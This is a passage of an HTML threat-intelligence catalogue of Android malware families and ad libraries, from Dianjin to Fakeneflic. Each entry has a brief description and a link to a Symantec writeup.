<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 105. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-2453-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-2453-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dianjin"><a class="anchor" href="#_dianjin"></a><a class="link" href="#_dianjin">Dianjin</a></h3>
<div class="paragraph">
<p>Dianjin is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 106. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-0313-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-0313-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dogowar"><a class="anchor" href="#_dogowar"></a><a class="link" href="#_dogowar">Dogowar</a></h3>
<div class="paragraph">
<p>Dogowar is a Trojan horse on the Android platform that sends SMS texts to all contacts on the device. It is a repackaged version of a game application called Dog Wars, which can be downloaded from a third party market and must be manually installed.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 107. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-081510-4323-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-081510-4323-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_domob"><a class="anchor" href="#_domob"></a><a class="link" href="#_domob">Domob</a></h3>
<div class="paragraph">
<p>Domob is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 108. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-4235-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-4235-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dougalek"><a class="anchor" href="#_dougalek"></a><a class="link" href="#_dougalek">Dougalek</a></h3>
<div class="paragraph">
<p>Dougalek is a Trojan horse for Android devices that steals information from the compromised device. The threat is typically disguised to display a video.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 109. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-041601-3400-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-041601-3400-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dowgin"><a class="anchor" href="#_dowgin"></a><a class="link" href="#_dowgin">Dowgin</a></h3>
<div class="paragraph">
<p>Dowgin is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 110. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-033108-4723-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-033108-4723-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_droidsheep"><a class="anchor" href="#_droidsheep"></a><a class="link" href="#_droidsheep">Droidsheep</a></h3>
<div class="paragraph">
<p>Droidsheep is a hacktool for Android devices that hijacks social networking accounts on compromised devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 111. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-031014-3628-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-031014-3628-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dropdialer"><a class="anchor" href="#_dropdialer"></a><a class="link" href="#_dropdialer">Dropdialer</a></h3>
<div class="paragraph">
<p>Dropdialer is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 112. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-070909-0726-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-070909-0726-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dupvert"><a class="anchor" href="#_dupvert"></a><a class="link" href="#_dupvert">Dupvert</a></h3>
<div class="paragraph">
<p>Dupvert is a Trojan horse for Android devices that opens a back door and steals information from the compromised device. It may also perform other malicious activities.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 113. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-072313-1959-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-072313-1959-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dynamicit"><a class="anchor" href="#_dynamicit"></a><a class="link" href="#_dynamicit">Dynamicit</a></h3>
<div class="paragraph">
<p>Dynamicit is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 114. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-1346-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-1346-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ecardgrabber"><a class="anchor" href="#_ecardgrabber"></a><a class="link" href="#_ecardgrabber">Ecardgrabber</a></h3>
<div class="paragraph">
<p>Ecardgrabber is an application that attempts to read details from NFC enabled credit cards. It attempts to read information from NFC enabled credit cards that are in close proximity.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 115. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-062215-0939-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-062215-0939-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ecobatry"><a class="anchor" href="#_ecobatry"></a><a class="link" href="#_ecobatry">Ecobatry</a></h3>
<div class="paragraph">
<p>Ecobatry is a Trojan horse for Android devices that steals information and sends it to a remote location.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 116. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-080606-4102-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-080606-4102-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_enesoluty"><a class="anchor" href="#_enesoluty"></a><a class="link" href="#_enesoluty">Enesoluty</a></h3>
<div class="paragraph">
<p>Enesoluty is a Trojan horse for Android devices that steals information and sends it to a remote location.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 117. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-090607-0807-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-090607-0807-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_everbadge"><a class="anchor" href="#_everbadge"></a><a class="link" href="#_everbadge">Everbadge</a></h3>
<div class="paragraph">
<p>Everbadge is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 118. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-3736-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-3736-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ewalls"><a class="anchor" href="#_ewalls"></a><a class="link" href="#_ewalls">Ewalls</a></h3>
<div class="paragraph">
<p>Ewalls is a Trojan horse for the Android operating system that steals information from the mobile device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 119. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2010-073014-0854-99">https://www.symantec.com/security_response/writeup.jsp?docid=2010-073014-0854-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_exprespam"><a class="anchor" href="#_exprespam"></a><a class="link" href="#_exprespam">Exprespam</a></h3>
<div class="paragraph">
<p>Exprespam is a Trojan horse for Android devices that displays a fake message and steals personal information stored on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 120. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-010705-2324-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-010705-2324-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakealbums"><a class="anchor" href="#_fakealbums"></a><a class="link" href="#_fakealbums">Fakealbums</a></h3>
<div class="paragraph">
<p>Fakealbums is a Trojan horse for Android devices that monitors and forwards received messages from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 121. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-071819-0636-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-071819-0636-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakeangry"><a class="anchor" href="#_fakeangry"></a><a class="link" href="#_fakeangry">Fakeangry</a></h3>
<div class="paragraph">
<p>Fakeangry is a Trojan horse on the Android platform that opens a back door, downloads files, and steals potentially confidential information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 122. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-022823-4233-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-022823-4233-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakeapp"><a class="anchor" href="#_fakeapp"></a><a class="link" href="#_fakeapp">Fakeapp</a></h3>
<div class="paragraph">
<p>Fakeapp is a Trojan horse for Android devices that downloads configuration files to display advertisements and collects information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 123. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-022805-4318-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-022805-4318-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakebanco"><a class="anchor" href="#_fakebanco"></a><a class="link" href="#_fakebanco">Fakebanco</a></h3>
<div class="paragraph">
<p>Fakebanco is a Trojan horse for Android devices that redirects users to a phishing page in order to steal their information.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 124. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-112109-5329-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-112109-5329-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakebank"><a class="anchor" href="#_fakebank"></a><a class="link" href="#_fakebank">Fakebank</a></h3>
<div class="paragraph">
<p>Fakebank is a Trojan horse that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 125. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-071813-2448-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-071813-2448-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakebank_b"><a class="anchor" href="#_fakebank_b"></a><a class="link" href="#_fakebank_b">Fakebank.B</a></h3>
<div class="paragraph">
<p>Fakebank.B is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 126. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-101114-5645-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-101114-5645-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakebok"><a class="anchor" href="#_fakebok"></a><a class="link" href="#_fakebok">Fakebok</a></h3>
<div class="paragraph">
<p>Fakebok is a Trojan horse for Android devices that sends SMS messages to premium phone numbers.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 127. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-021115-5153-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-021115-5153-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakedaum"><a class="anchor" href="#_fakedaum"></a><a class="link" href="#_fakedaum">Fakedaum</a></h3>
<div class="paragraph">
<p>Fakedaum is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 128. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-061813-3630-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-061813-3630-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakedefender"><a class="anchor" href="#_fakedefender"></a><a class="link" href="#_fakedefender">Fakedefender</a></h3>
<div class="paragraph">
<p>Fakedefender is a Trojan horse for Android devices that displays fake security alerts in an attempt to convince the user to purchase an app in order to remove non-existent malware or security risks from the device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 129. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-060301-4418-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-060301-4418-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakedefender_b"><a class="anchor" href="#_fakedefender_b"></a><a class="link" href="#_fakedefender_b">Fakedefender.B</a></h3>
<div class="paragraph">
<p>Fakedefender.B is a Trojan horse for Android devices that displays fake security alerts in an attempt to convince the user to purchase an app in order to remove non-existent malware or security risks from the device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 130. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-091013-3953-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-091013-3953-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakedown"><a class="anchor" href="#_fakedown"></a><a class="link" href="#_fakedown">Fakedown</a></h3>
<div class="paragraph">
<p>Fakedown is a Trojan horse for Android devices that downloads more malicious apps onto the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 131. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-041803-5918-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-041803-5918-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakeflash"><a class="anchor" href="#_fakeflash"></a><a class="link" href="#_fakeflash">Fakeflash</a></h3>
<div class="paragraph">
<p>Fakeflash is a Trojan horse for Android devices that installs a fake Flash application in order to direct users to a website.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 132. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-070318-2122-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-070318-2122-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakegame"><a class="anchor" href="#_fakegame"></a><a class="link" href="#_fakegame">Fakegame</a></h3>
<div class="paragraph">
<p>Fakegame is a Trojan horse for Android devices that displays advertisements and steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 133. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-040808-2922-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-040808-2922-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakeguard"><a class="anchor" href="#_fakeguard"></a><a class="link" href="#_fakeguard">Fakeguard</a></h3>
<div class="paragraph">
<p>Fakeguard is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 134. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-102908-3526-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-102908-3526-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakejob"><a class="anchor" href="#_fakejob"></a><a class="link" href="#_fakejob">Fakejob</a></h3>
<div class="paragraph">
<p>Fakejob is a Trojan horse for Android devices that redirects users to scam websites.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 135. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-030721-3048-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-030721-3048-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakekakao"><a class="anchor" href="#_fakekakao"></a><a class="link" href="#_fakekakao">Fakekakao</a></h3>
<div class="paragraph">
<p>Fakekakao is a Trojan horse for Android devices sends SMS messages to contacts stored on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 136. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-071617-2031-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-071617-2031-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakelemon"><a class="anchor" href="#_fakelemon"></a><a class="link" href="#_fakelemon">Fakelemon</a></h3>
<div class="paragraph">
<p>Fakelemon is a Trojan horse for Android devices that blocks certain SMS messages and may subscribe to services without the user&#8217;s consent.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 137. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-120609-3608-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-120609-3608-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakelicense"><a class="anchor" href="#_fakelicense"></a><a class="link" href="#_fakelicense">Fakelicense</a></h3>
<div class="paragraph">
<p>Fakelicense is a Trojan horse that displays advertisements on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 138. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-062709-1437-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-062709-1437-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakelogin"><a class="anchor" href="#_fakelogin"></a><a class="link" href="#_fakelogin">Fakelogin</a></h3>
<div class="paragraph">
<p>Fakelogin is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 139. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-102108-5457-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-102108-5457-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakelookout"><a class="anchor" href="#_fakelookout"></a><a class="link" href="#_fakelookout">FakeLookout</a></h3>
<div class="paragraph">
<p>FakeLookout is a Trojan horse for Android devices that opens a back door and steals information on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 140. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-101919-2128-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-101919-2128-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakemart"><a class="anchor" href="#_fakemart"></a><a class="link" href="#_fakemart">FakeMart</a></h3>
<div class="paragraph">
<p>FakeMart is a Trojan horse for Android devices that may send SMS messages to premium rate numbers. It may also block incoming messages and steal information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 141. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-081217-1428-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-081217-1428-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakemini"><a class="anchor" href="#_fakemini"></a><a class="link" href="#_fakemini">Fakemini</a></h3>
<div class="paragraph">
<p>Fakemini is a Trojan horse for Android devices that disguises itself as an installation for the Opera Mini browser and sends premium-rate SMS messages to a predetermined number.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 142. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-110410-5958-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-110410-5958-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakemrat"><a class="anchor" href="#_fakemrat"></a><a class="link" href="#_fakemrat">Fakemrat</a></h3>
<div class="paragraph">
<p>Fakemrat is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 143. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2016-012608-1538-99">https://www.symantec.com/security_response/writeup.jsp?docid=2016-012608-1538-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakeneflic"><a class="anchor" href="#_fakeneflic"></a><a class="link" href="#_fakeneflic">Fakeneflic</a></h3>
<div class="paragraph">
<p>Fakeneflic is a Trojan horse that steals information from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 144. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-101105-0518-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-101105-0518-99</a></p></td>
</tr>
</tbody>
